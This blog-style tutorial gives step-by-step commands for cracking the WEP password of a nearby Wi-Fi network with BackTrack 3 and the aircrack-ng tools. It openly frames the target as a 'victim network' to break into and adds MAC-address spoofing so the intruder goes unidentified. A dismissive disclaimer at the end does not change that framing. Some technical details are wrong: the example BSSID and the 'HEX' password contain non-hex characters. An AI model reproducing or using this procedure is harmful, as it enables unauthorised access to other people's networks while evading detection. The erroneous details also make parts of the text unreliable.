How To Hack WEP wifi Passwords
Posted in how to hack
Hacking
WEP wifi passwords
1.
Getting the right tools
Download
Backtrack 3. It can be found here:
The
Backtrack 4 beta is out but until it is fully tested (especially if you are a
noob) I
would
get the BT3 setup. The rest of this guide will proceed assuming you downloaded
BT3.
I downloaded the CD iso and burned it to a cd. Insert your BT3 cd/usb drive and
reboot
your computer into BT3. I always load into the 3rd boot option from the boot
menu.
(VESA/KDE) You only have a few seconds before it auto-boots into the 1st
option
so be ready. The 1st option boots too slowly or not at all so always boot from
the
2nd or 3rd. Experiment to see what works best for you.
2.
Preparing the victim network for attack
Once
in BT3, click the tiny black box in the lower left corner to load up a
"Konsole"
window.
Now we must prep your wireless card.
Type:
airmon-ng
You
will see the name of your wireless card. (mine is named "ath0") From
here on out,
replace
"ath0" with the name of your card.
Now
type:
airmon-ng
stop ath0
then
type:
ifconfig
wifi0 down
then:
macchanger
--mac 00:11:22:33:44:55 wifi0
then:
airmon-ng
start wifi0
What
these steps did was to spoof (fake) your mac address so that JUST IN CASE
your
computeris discovered by someone as you are breaking in, they will not see your
REAL
mac address. Moving on...
Now
it's time to discover some networks to break into.
Type:
airodump-ng
ath0
Now
you will see a list of wireless networks start to populate. Some wil have a better
signal
than others and it is a good idea to pick one that has a decent signal
otherwise
it
will take forever to crack or you may not be able to crack it at all.
Once
you see the network that you want to crack, do this:
hold
down ctrl and tap c
This
will stop airodump from populating networks and will freeze the screen so that
you
can see the info that you need.
**Now
from here on out, when I tel you to type
a command, you need to replace
whatever
is in parenthesis with what I tell you to from your screen. For example: if i
say
to type:
-c
(channel)
then
dont actually type in
-c
(channel)
Instead,
replace that with whatever the channel number is...so, for example you would
type:
-c 6
Can't
be much clearer than that. .lets continue...
Now
find the network that you want to crack and MAKE SURE that it says the
encryption
for that network is WEP. If it says WPA or any variation of WPA then
move
on...you can still crack WPA with backtrack and some other tools but it is a
whole
other ball game and you need to master WEP first.
Once
you've decided on a network, take note of its channel number and bssid. The
bssid
will look something like this --> 05:gk:30:fo:s9:2n
The
Channel number will be under a heading that says "CH".
Now,
in the same Konsole window, type:
airodump-ng
-c (channel) -w (file name) --bssid (bssid) ath0
the
FILE NAME can be whatever you want. This is simply the place that airodump is
going
to store the packets of info that you receive to later crack. You don't even
put
in
an extension...just pick a random word that you will remember. I usually make
mine
"wepkey"
because I can always remember it.
**Side
Note: if you crack more than one network in the same session, you must have
different
file names for each one or it won't work. I usually just name them wepkey1,
wepkey2,
etc.
Once you typed in
that last command, the screen of airodump wil
change and start to
show your computer
gathering packets. You will also see a heading marked "IV" with a
number
underneath it. This stands for "Initialization Vector" but in noob
terms all
this
means is "packets of info that contain clues to the password." Once
you gain a
minimum
of 5,000 of these IV's, you can try to crack the password.
I've
cracked some right at 5,000 and others have taken over 60,000. It just depends
on
how long and difficult they made the password.
Now
you are thinking, "I'm screwed because my IV's are going up really
slowly." Wel ,
don't
worry, now we are going to trick the router into giving us HUNDREDS of IV's
per
second.
3.
Actually cracking the WEP password
Now
leave this Konsole window up and running and open up a 2nd Konsole window. In
this
one type:
aireplay-ng
-1 0 -a (bssid) -h 00:11:22:33:44:55 ath0
This
will generate a bunch of text and then you will see a line where your computer
is
gathering
a bunch of packets and waiting on ARP and ACK. Don't worry about what
these
mean...just know that these are your meal tickets. Now you just sit and wait.
Once
your computer finally gathers an ARP request, it will send it back to the router
and
begin to generate hundreds of ARP and ACK per second. Sometimes this starts to
happen
within seconds...sometimes you have to wait up to a few minutes. Just be
patient.
When it finally does happen, switch back to your first Konsole window and
you
should see the number underneath the IV starting to rise rapidly. This is
great!
It
means you are almost finished! When this number reaches AT LEAST 5,000 then
you
can start your password crack. It will probably take more than this but I
always
start
my password cracking at 5,000 just in case they have a really weak password.
Now
you need to open up a 3rd and final Konsole window. This will be where we
actually
crack the password. Type:
aircrack-ng
-b (bssid) (filename)-01.cap
Remember
the filename you made up earlier? Mine was "wepkey". Don't put a
space in
between
it and -01.cap here. Type it as you see it. So for me, I would type
wepkey-01.cap
Once
you have done this you will see aircrack fire up and begin to crack the
password.
typically
you have to wait for more like 10,000 to 20,000 IV's before it will crack. If
this
is the case, aircrack will test what you've got so far and then it will say
something
like "not enough IV's. Retry at 10,000." DON'T DO ANYTHING! It will
stay
running...it is just letting you know that it is on pause until more IV's are
gathered.
Once you pass the 10,000 mark it will automatically fire up again and try to
crack
it. If this fails it will say "not enough IV's. Retry at 15,000." and
so on until it
finally
gets it.
If
you do everything correctly up to this point, before too long you will have the
password!
now if the password looks goofy, dont worry, it will still work. some
passwords
are saved in ASCII format, in which case, aircrack will show you exactly
what
characters they typed in for their password. Sometimes, though, the password
is
saved in HEX format in which case the computer will show you the HEX encryption
of
the password. It doesn't matter either way, because you can type in either one
and
it wil connect you to the network.
Take
note, though, that the password will always be displayed in aircrack with a
colon
after
every 2 characters. So for instance if the password was "secret", it
would be
displayed
as:
se:cr:et
This
would obviously be the ASCII format. If it was a HEX encrypted password that
was
something like "0FKW9427VF" then it would still display as:
0F:KW:94:27:VF
Just
omit the colons from the password, boot back into whatever operating system
you
use, try to connect to the network and type in the password without the colons
and
presto! You are in!
It
may seem like a lot to deal with if you have never done it, but after a few
successful
attempts, you will get very quick with it. If I am near a WEP encrypted
router
with a good signal, I can often crack the password in just a couple of minutes.
I am
not responsible for what you do with this information. Any malicious/il egal
activity
that you do, falls completely on you because...technically...this is just for
you
to
test the security of your own network. :-)
I
will gladly answer any legitimate questions anyone has to the best of my
ability.
HOWEVER,
I WILL NOT ANSWER ANYONE THAT IS TOO LAZY TO READ THE
WHOLE
TUT AND JUST ASKS ME SOME QUESTION THAT I CLEARLY
ANSWERED.
No one wants to hold your hand through this...read the tut and go
experiment
until you get it right.
There
are rare occasions where someone will use WEP encryption with SKA as well.
(Shared
Key Authentication) If this is the case, additional steps are needed to
associate
with the router and therefore, the steps I lined out here will not work. I've
only
seen this once or twice, though, so you probably won't run into it. If I get
motivated,
I may throw up a tut on how to crack this in the future.
